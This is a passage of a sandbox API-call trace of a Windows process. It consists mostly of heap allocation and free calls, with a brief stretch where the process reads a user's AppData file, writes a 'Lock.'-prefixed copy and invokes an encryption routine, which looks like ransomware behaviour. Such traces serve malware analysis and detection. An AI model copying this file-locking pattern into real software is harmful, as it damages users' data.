dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0233.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0233.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0233.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0233.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0233.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0233.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0233.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/K KvEQBDpvTatLEa.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\k kveqbdpvtatlea.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0233.416] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.416] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0233.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0233.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0233.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0233.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.416] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0233.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.K KvEQBDpvTatLEa.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.k kveqbdpvtatlea.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0233.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0233.465] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0233.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0233.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.469] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0233.469] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x67e3, lpOverlapped=0x0) returned 1 [0233.472] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0233.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67e3) returned 0x3bf0dd8 [0233.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0233.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0233.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0233.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0233.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0233.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0233.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67e3) returned 0x2f14818 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67e3) returned 0x3bf0dd8 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0233.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0233.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0233.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0233.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.546] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0233.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0233.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67e3) returned 0x3bf0dd8 [0233.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0233.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f78 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0233.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55038 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0233.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67e3) returned 0x2f1b008 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.548] RtlAllocateHeap 